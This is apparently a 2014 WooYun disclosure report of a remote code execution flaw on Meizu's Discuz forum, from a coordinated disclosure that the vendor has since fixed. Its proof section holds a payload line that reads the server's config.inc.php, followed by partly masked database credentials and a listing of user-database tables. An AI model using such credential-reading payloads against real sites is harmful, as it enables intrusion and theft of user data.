当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080884

漏洞标题:魅族科技某分站存在远程代码执行漏洞(千万用户信息受影响)

相关厂商:魅族科技

漏洞作者: 猪猪侠

提交时间:2014-10-26 18:05

修复时间:2014-12-01 10:06

公开时间:2014-12-01 10:06

漏洞类型:应用配置错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-26: 细节已通知厂商并且等待厂商处理中
2014-10-26: 厂商已经确认,细节仅向厂商公开
2014-11-05: 细节向核心白帽子及相关领域专家公开
2014-11-15: 细节向普通白帽子公开
2014-11-25: 细节向实习白帽子公开
2014-12-01: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

魅族科技某分站远程代码执行漏洞(千万用户信息受影响)

详细说明:

影响网站:
http://forum.meizu.com/
Disucz ucenter 用户将近1000万


mask 区域
*****^^^*****
1.http://**.**.**/dzvul/sodb/19/sodb-2010-01.txt


meizu.png

漏洞证明:

meizu_cmd.png


cmd=echo readfile('./config.inc.php');

<?php
//UTF8转码
/*
[Discuz!] (C)2001-2006 Comsenz Inc.
This is NOT a freeware, use is subject to license terms
$RCSfile: config5.inc.php,v $
$Revision: 1.9 $
$Date: 2007/01/26 01:11:32 $
*/
// [CH] 以下变量请根据空间商提供的账号参数修改,如有疑问,请联系服务器提供商
$dbhost = '192.168.**.**'; // 数据库服务器
$dbuser = 'meizu_**bbs'; // 数据库用户名
$dbpw = 'wdw5NR*****aAhW'; // 数据库密码
$dbname = 'meizu_enbbs'; // 数据库名
$pconnect = 0; // 数据库持久连接 0=关闭, 1=打开
// [CH] 如您对 cookie 作用范围有特殊要求, 或论坛登录不正常, 请修改下面变量, 否则请保持默认
$cookiepre = 'dZJ_'; // cookie 前缀
$cookiedomain = ''; // cookie 作用域
$cookiepath = '/'; // cookie 作用路径
// [CH] 论坛投入使用后不能修改的变量
$tablepre = 'cdb_'; // 表名前缀, 同一数据库安装多个论坛请修改此处
// [CH] 小心修改以下变量, 否则可能导致论坛无法正常使用
$database = 'mysql'; // 论坛数据库类型,请勿修改
$dbcharset = ''; // MySQL 字符集, 可选 'gbk', 'big5', 'utf8', 'latin1', 留空为按照论坛字符集设定
$charset = 'utf-8'; // 论坛页面默认字符集, 可选 'gbk', 'big5', 'utf-8'
$headercharset = 0; // 强制论坛页面使用默认字符集,可避免部分服务器空间页面出现乱码,一般无需开启。 0=关闭 1= 开启
$tplrefresh = 1; // 论坛风格模板自动刷新开关 0=关闭, 1=打开。

// [CH] 论坛安全设置, 调整以下设置,可以增强论坛的安全性能和防御性能
$adminemail = '[email protected]'; // 系统管理员 Email


[SHOW TABLES FROM `meizu_user`]
-------------------- -
Tables_in_meizu_user |
-------------------- -
TMP_VCH_02bea2a76c1f4f2491ae58252cbcfc71875 |
TMP_VCH_0952588bd0904304a66e5db830d70853224 |
TMP_VCH_131a1deb65bf4ab0b75dff6fa00c71c6923 |
TMP_VCH_2ee3064b952241e694fcc5704dd37c286 |
TMP_VCH_31ef36f285804af7a48bb939d7cc93a4544 |
TMP_VCH_326901080e2d4cf8a85586e29f41f18065 |
TMP_VCH_3cbe635e43be490296dbdc769d9e6774657 |
TMP_VCH_3fcd7a5ee099423ba2383f459c8e0e98744 |
TMP_VCH_530da630629843f6acd070b435bc7045572 |
TMP_VCH_6fb938aba3ac4d34a3b156eefd6e7805262 |
TMP_VCH_8a33e169514241ed9c8abbd76733b55a187 |
TMP_VCH_8aae9628d37f44c785090f0a67e3a16f692 |
TMP_VCH_9077238e556a4a068d54a5aee0b5113b846 |
TMP_VCH_a28ce46669ef4c89b0eecd23c0cca09d778 |
TMP_VCH_a58b7ec518b443048d0ffce7efdc3e0b311 |
TMP_VCH_b84f960d9531447196fae440b2207791691 |
TMP_VCH_bdfb1492eba54967a1c5ef6e09a44424884 |
TMP_VCH_d02e1d2e1f8c4c819931ce72a4d3c571927 |
TMP_VCH_d7b21c017ff4415cb8c584d524cf3498975 |
T_APP_PRODUCT_ORDER |
T_AUTH_GRANT |
T_AUTH_OAUTH |
T_AUTH_RESOURCE |
T_AUTH_ROLE |
T_AUTH_ROLE_RESOURCE |
T_AUTH_USER |
T_BBS_DONATE_PERSON |
T_BBS_TITLE_INFO |
T_BS_BASEDATA |
T_BS_BASEDATA_LANG |
T_BS_BASEDATA_TYPE |
T_BS_GENERATECODE |
T_BS_GENERATECODE_LAST |
T_BS_IDENTITY |
T_BS_LOG |
T_BS_LOGINFAIL |
T_BS_LOGIN_URL |
T_BS_PARAMETER |
T_BS_PUSH_ROUTER |
T_BS_PWDKEY |
T_BS_REFERBD |
T_FNBL_CATEGORY |
T_UC_ACCOUNT |
T_UC_ACCOUNT_bak |
T_UC_BAL_0424 |
T_UC_BAL_CHANGE_0424 |
T_UC_BILL |
T_UC_BILL_LOSTDATA_0424 |
T_UC_CHECKACCOUT_0424 |
T_UC_DONATE_0424 |
T_UC_LOGIN_VALIDCODE |
T_UC_MEMBERS_ACTIVE |
T_UC_MEMBERS_EXT |
T_UC_MEMBERS_MODIFY_ACTIVED_EMAIL |
T_UC_MEMBERS_VERIFICATION_CODE |
T_UC_MEMBER_DONATE |
T_UC_MEMBER_SN |
T_UC_MEMBER_SN_TMP |
T_UC_PAYMENT |
T_UC_PAYMENT_0424 |
T_UC_PAYMENT_APPEAL_0424 |
T_UC_PAYMENT_TEMP_0424 |
T_UC_PAYMENT_tmp |
T_UC_TICKET |
T_UC_USER_BAL |
T_UC_VOUCHER_ENTRY_LOSTDATA |
T_UC_VOUCHER_ENTRY_tmp |
admin |
all_sn_1_tmp |
all_sn_2_tmp |
exists_sn_tmp |
exists_sn_tmp2 |
imsi_card |
meizu_device |
no_exists_sn_tmp |
no_exists_sn_tmp2 |
not_update_id_tmp |
online_meizu_device |
online_meizu_device_20140630_bak |
online_meizu_device_20140710_bak |
online_meizu_device_BAK_0711 |
to_delete_id_tmp |
uc_admins |
uc_applications |
uc_badwords |
uc_create_members |
uc_domains |
uc_events |
uc_failedlogins |
uc_feeds |
uc_friends |
uc_mailqueue |
uc_memberfields |
uc_members |
uc_mergemembers |
uc_newpm |
uc_notelist |
uc_pm_indexes |
uc_pm_lists |
uc_pm_members |
uc_pm_messages_0 |
uc_pm_messages_1 |
uc_pm_messages_2 |
uc_pm_messages_3 |
uc_pm_messages_4 |
uc_pm_messages_5 |
uc_pm_messages_6 |
uc_pm_messages_7 |
uc_pm_messages_8 |
uc_pm_messages_9 |
uc_pms |
uc_protectedmembers |
uc_settings |
uc_sqlcache |
uc_tags |
uc_user_answer |
uc_user_setting |
uc_vars |
user_nickname_locus |


修复方案:

更改php.ini
设置: request_order为GPC

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-10-26 18:35

厂商回复:

厂商正在处理

最新状态:

2014-12-01:此漏洞已修复。